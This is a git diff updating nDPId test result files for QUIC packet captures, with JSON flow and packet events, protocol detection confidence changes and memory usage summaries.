+00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434528,"flow_last_seen":1603816434679,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00864{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434595,"flow_last_seen":1603816435011,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816434609,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1668,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00855{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434569,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434806,"flow_last_seen":1603816435089,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434678,"flow_last_seen":1603816434822,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434524,"flow_last_seen":1603816444507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} 
+00855{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434680,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434656,"flow_last_seen":1603816435111,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00859{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434729,"flow_last_seen":1603816444586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434507,"flow_last_seen":1603816444490,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434765,"flow_last_seen":1603816435194,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434648,"flow_last_seen":1603816434782,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":643,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00574{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","packets-captured":246,"packets-processed":246,"total-skipped-flows":0,"total-l4-payload-len":231120,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":77,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":77,"total-idle-flows":77,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":400,"global_ts_msec":1603816444721} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 246/246 @@ -406,9 +406,9 @@ ~~ total active/idle flows...: 77/77 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6596977 bytes -~~ total memory freed........: 6596977 bytes -~~ total allocations/frees...: 119993/119993 +~~ total memory allocated....: 6730611 bytes +~~ total memory freed........: 6730611 bytes +~~ total allocations/frees...: 122755/122755 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 2165 chars diff --git a/test/results/quic_q39.pcap.out b/test/results/quic_q39.pcap.out index 6008f6eff..407fab181 100644 --- a/test/results/quic_q39.pcap.out +++ b/test/results/quic_q39.pcap.out 
@@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1509098995610} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1509098995610,"flow_last_seen":1509098995610,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1509098995610,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1509098995610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1509098995610,"pkt":"AAAAPJ7rSEb7OSWDCABFAAVipylAAD8RBjiq2BDRFZ2345bcAbsFTtxhDeca1dd1bE1NUTAzOQFpm58AnJnQaHUqfgGgAQQAQ0hMTxsAAABQQUQA1AEAAFNOSQDhAQAAU1RLABcCAABWRVIAGwIAAENDUwArAgAATk9OQ0sCAABNU1BDTwIAAEFFQURTAgAAVUFJRIACAABTQ0lEkAIAAFRDSUSUAgAAUERNRJgCAABTTUhMnAIAAElDU0ygAgAAQ1RJTagCAABOT05QyAIAAFBVQlPoAgAATUlEU+wCAABTQ0xT8AIAAEtFWFP0AgAAWExDVPwCAABDU0NU\/AIAAENPUFT8AgAAQ0NSVBQDAABJUlRUGAMAAENGQ1ccAwAAU0ZDVyADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zLnlvdXR1YmUuY29tHmY9ku1OY40wxAcfyyHFWACuKRu9GR6V2xdJs\/1DZWDRgILbvi6YPymdOys8LmRShvdEmFTSUTAzOQHogWCSkhrofu2AhqIVgpFZ8wXyMDAwMDAwMDBOGwyq+nKlq\/7gyjM9fK1HfmcRm2QAAABBRVNHY29tLmdvb2dsZS5hbmRyb2lkLnlvdXR1YmUgQ3JvbmV0LzYzLjAuMzIyMy43EbUkNcc61MtqjsJrlOUgFgAAAABYNTA5AQAAAB4AAADyBfNZAAAAAJSFXrmNCzW2XCwCM6DbC32c2YfxELPjjStDUbaq7wmHTyY4LQBCW\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"} 
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1509098995610,"flow_last_seen":1509098995610,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1509098995610,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.youtube.com","user_agent":"com.google.android.youtube Cronet\/63.0.3223.7"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1509098995610,"flow_last_seen":1509098995610,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1509098995610,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.youtube.com","user_agent":"com.google.android.youtube Cronet\/63.0.3223.7"}} 
01979{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1509098995619,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1174,"pkt_l4_len":1140,"thread_ts_msec":1509098995619,"pkt":"AAAAPJ7rSEb7OSWDCABFAASIpypAAD8RBxGq2BDRFZ2345bcAbsEdFQcDeca1dd1bE1NUTAzOQJfXHZ4r4NHY5hNEdjLP+5ayCAfN4aRrJwcGbvr9Ig30\/shURCI87o6EE5x2r0qaxNPy9ijcArYvwm83T\/uUNOwvPrQL1kQ63P7NcdMjvNaDrlFf0DGfuOc7NBPTTXBkaePu98lEtAf3wsOApXg5IhtfmWdfKrgEpCXWFWsxttw6C4\/lCwJqkUGaOjHW5OhnY9r8qCDBdkX4XN\/4WmFW6nWq\/XYAKSy+w3zKPd0+LJKlxsYwrzgGV2rjQwmb93iv1FFvCzNy4lqNoUoMblenytDJV5TJvGYH4s+\/7AX7HDhbJj+lIeaRA3g7dV3H3kgoU\/SpbsdOzy0YVY6Bp9yZermraiyHURn7bAotygD2Vp7YwNcdNEG9BU3funEay5GDjyBK1j66ZDJgNXirLZjzse1+VcJnT0WzMubicwvU30jDw+McSt9Bti6\/gP9FAz9\/lD31IeL8vackSc4lx75mviO5HS6BA\/NqsjQ9B8m4Ji2diYR80xUpIbgdFQiU+oifhm6+LGlaffXf5zfdWBFidIfld\/b7JT3SCK0xn1oi2TKxI8Oroqc4ijms7JGelhl0fef2CpmP0WCIT2YgyU6YwvWa1W7lII+N1ZbTeUAByGqF1QhTf5cSKd79GJRi+dbNY7B3Wj4KJv9v8GAF7TKwPiEZdDEpbOPHL\/FjvVpM04y5hU8HR+06oyFgTK1\/6hdbKNXNH9cJjr2nmUmezntPWc2AFfXM+e\/7E1fv7zcT4Kq1YOLXr9\/RjJvDNQoj81czTWLgfREm6KUrj\/r6fSbFJFnhuScfBlR9k2Pc7b3lIEZb0KXGhxHCyB1J7D8gUoqDhJYFGV+VkGVNhJpozvYPJ8ykH\/Y41HD8nsSDL9iDj9URAxCKHefDlX7Pwz6OhBfkcIZAyY3zG\/w9rr4x0Pl7U6qcsdZ1MBpDJ9qjugA+Tt8C4JpvLxNAR0kx92LyFnt3BYr58WDPwTbktI01oxzKDO5QfY46azjmnqJ+Or2LI93bDxwCMYKsLGAmehhGKZad4Iy8CQig4MBQDG0NMhHKAI6+BaplljmUnDnEalyg57\/03tWWLR4CQIYoKQ9N\/\/fDmFtkFJjraB0A767qxG7Cy8Linc3qzCa86538v6kM371bSCg\/XlL+EWzVEgq8MNOp+Kf2xPBIqWXFiVMGJ1GcpQwm6iQItRpY+85J5+RUK5X+3OW5ex3EYIjJUr+g2x3sFkDiuAsaRHgrjj6WnNpOZnghw1uaYp+E3H8VPrRSwSKqch7lieJx+ojtBtD\/W9etVSxGJeGD7lz+4wIhuht4d\/jcmgefkRDKcrraaR9azCKs\/kbJ\/PpVxbRsVvTZyAXgG+ABf\/0Dt+UshFkLro\/tuKww4FrErwElInQ+88Azyk3w8tcu1AYrDqSPj2BvjSRVwl0PO7TtbVWqgcuYET3exljbs22Rr5eyEoiPXhNZMDC79zLn441b43FrUKvwSHTJR\/j33VYKbaP4oVCvb26Vw=="} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1509098995647,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1509098995647,"pkt":"AAAAPJ7rSEb7OSWDCABFAAA\/AABAADgRuYQVnbfjqtgQ0QG7ltwAKyQ\/COca1dd1bE1NATKbKH1UbNEn\/TIU5EABJEsBAQAAAAANBgA="} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1509098995610,"flow_last_seen":1509099044559,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":21651,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1509099044559,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1509098995610,"flow_last_seen":1509099044559,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":21651,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1509099044559,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"quic_q39.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":21651,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1509099044559} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 60/60 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871229 bytes -~~ total memory freed........: 5871229 bytes -~~ total allocations/frees...: 118175/118175 +~~ total memory allocated....: 6004863 bytes +~~ total memory freed........: 6004863 bytes +~~ total allocations/frees...: 120937/120937 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2247 chars diff --git a/test/results/quic_q43.pcap.out b/test/results/quic_q43.pcap.out index a81bd27cc..390fa897e 100644 --- a/test/results/quic_q43.pcap.out +++ b/test/results/quic_q43.pcap.out 
@@ -2,9 +2,9 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388060203} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388060203,"flow_last_seen":1592388060203,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388060203,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
